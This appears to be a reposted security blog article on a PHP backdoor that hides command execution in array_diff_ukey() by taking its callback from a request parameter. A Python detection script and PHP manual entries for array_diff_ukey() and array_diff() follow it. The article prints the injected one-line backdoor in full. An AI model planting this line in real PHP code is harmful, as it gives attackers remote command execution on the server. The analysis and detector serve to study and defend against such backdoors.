PHP Callback Functions: Another Way to Hide Backdoors

PHP security | admin | 1858 views | 0 comments

We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.

Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are certainly many other ways to run code, and they are not always so obvious. The most popular and commonly used one is the preg_replace() function.

According to its description, the preg_replace function “performs a regular expression search and replace.” Unfortunately, when used with the “\e” modifier, this function also executes code. Yes, there are more ways of running code without using the eval() function; examples include create_function() and assert(). All these options for running code make malware analysis that much more complex a process.

That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.

The Backdoor

It started with the following line of code injected at the top of a legitimate PHP file:

@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);

It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?

The malware author set the callback function to be the variable “login”, which is controlled by the attacker. So he can set login to be the system or exec function, allowing him to execute commands on the server.

Take a look at this example:

[Screenshot from the original post: array_diff_ukey]

Yes, he just ran the “system” command using this technique. And he can execute any other commands he wants on the server, with that 1 line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.

What’s the Big Deal?

Most security tools and articles online recommend that webmasters look for a certain subset of functions that are often used for malicious purposes, like eval, preg_replace, base64_decode and a few other combinations. Well, guess what: attackers know that too, and look at what they are starting to employ, good functions for bad purposes.

Also, note that they are not just restricted to the array_diff_ukey() function, but any other function that allows for callbacks.
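One way to hunt for this pattern on the defensive side, as an added Python example that is not code from the Sucuri post or from this blog: it scans PHP source for calls to callback-accepting functions and reports any whose callback argument is not a literal, rating a finding high when that argument is built from a request superglobal. It generalises beyond array_diff_ukey() to the other callback-taking functions the text alludes to; the function list with callback positions, the heuristics and the sample PHP are assumptions constructed for this example.

```python
import re
# Callback-taking functions mapped to the 0-based position of the callback
# (-1 = last argument). An assumed subset, not a full inventory of PHP's API.
CALLBACK_POS = {
    "array_diff_ukey": -1, "array_diff_uassoc": -1, "array_udiff": -1,
    "array_intersect_ukey": -1, "array_map": 0, "array_filter": 1, "usort": 1,
    "uasort": 1, "uksort": 1, "call_user_func": 0, "preg_replace_callback": 1,
}
CALL_RE = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)\s*\(")
SUPERGLOBAL_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES)\b")
# A quoted string, closure or null callback is fixed in the source itself.
LITERAL_RE = re.compile(r"""^(?:'[^']*'|"[^"]*"|function\b|fn\b|null\b)""", re.I)

def split_top_level_args(text, start):
    # Split the arguments after '(' on top-level commas (heuristic: string
    # literals are not tracked). Returns None if the call is not closed here.
    args, buf, depth = [], "", 0
    for c in text[start:]:
        if c in "([":
            depth += 1
        elif c in ")]":
            if depth == 0:
                return args + [buf.strip()]
            depth -= 1
        if c == "," and depth == 0:
            args.append(buf.strip())
            buf = ""
        else:
            buf += c
    return None

def scan_php(source):
    # Return (line_no, function, callback_arg, severity) for calls whose callback
    # is not a literal: 'high' when built from request data, otherwise 'review'.
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            pos = CALLBACK_POS.get(m.group(1).lower())
            args = split_top_level_args(line, m.end()) if pos is not None else None
            if not args or pos >= len(args) or not args[pos]:
                continue
            cb = args[pos].lstrip("@ ")
            if not LITERAL_RE.match(cb):
                severity = "high" if SUPERGLOBAL_RE.search(cb) else "review"
                findings.append((line_no, m.group(1).lower(), cb, severity))
    return findings

# Constructed sample: two legitimate calls plus the injected line from the post.
SAMPLE_PHP = r"""<?php
usort($items, 'compare_by_name');
$clean = array_map('trim', $_POST['tags']);
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);"""
print(scan_php(SAMPLE_PHP))  # [(4, 'array_diff_ukey', "$_REQUEST['login']", 'high')]
```

The array_map() call is not reported because its callback is the literal 'trim' even though its data argument comes from $_POST; only the callback position is judged.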

There goes the neighborhood…

Source: http://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html

PHP array functions: array_diff_ukey, computing the difference of arrays using a callback function on the keys

The array_diff_ukey() function computes the difference of arrays using a callback function on the keys.

【Description】 This function returns an array containing the values from array1 whose keys are not present in any of the other parameter arrays. Note that the key associations are preserved. The comparison is performed by a user-supplied callback function, which must return an integer less than, equal to, or greater than zero if the first argument is considered to be respectively less than, equal to, or greater than the second. Unlike array_diff(), the comparison is done on the keys rather than the values.

【Availability】 php5 > 5.1.0

【Usage】 array array_diff_ukey( array array1, array array2 [, array…, callback key_compare_func] )

array1 / required / the first array
array2 / required / an array to compare against; at least one is needed
array… / optional / further arrays to compare against
key_compare_func / required / user-supplied callback function used as the comparison criterion

【Example】

<?php
// Define the callback function used to compare keys
function key_compare_func($key1, $key2)
{
    if ($key1 == $key2)
        return 0;
    else if ($key1 > $key2)
        return 1;
    else
        return -1;
}
// Define the two arrays to compare
$array1 = array("blue" => 1, "red" => 2, "green" => 3, "purple" => 4);
$array2 = array("green" => 5, "blue" => 6, "yellow" => 7, "cyan" => 8);
// Keys of $array1 that do not appear in $array2
print_r(array_diff_ukey($array1, $array2, "key_compare_func"));
/*
Array
(
    [red] => 2
    [purple] => 4
)*/

PHP array_diff() Function

Definition and Usage

The array_diff() function returns the difference of two arrays: an array containing all the entries of the compared array that are not present in any of the other parameter arrays.

In the returned array, the keys are preserved.

Syntax

array_diff(array1,array2,array3...)

Parameter | Description
array1 | Required. The first array, which the other arrays are compared against.
array2 | Required. An array to compare against the first array.
array3 | Optional. An array to compare against the first array.

Tips and Notes

Tip: One or any number of arrays can be compared against the first array.

Note: Only the values are used for comparison.

Example

<?php
$a1=array(0=>"Cat",1=>"Dog",2=>"Horse");
$a2=array(3=>"Horse",4=>"Dog",5=>"Fish");
print_r(array_diff($a1,$a2));
?>

Output:

Array ( [0] => Cat )

Please credit when reposting: jinglingshu's blog » PHP Callback Functions: Another Way to Hide Backdoors
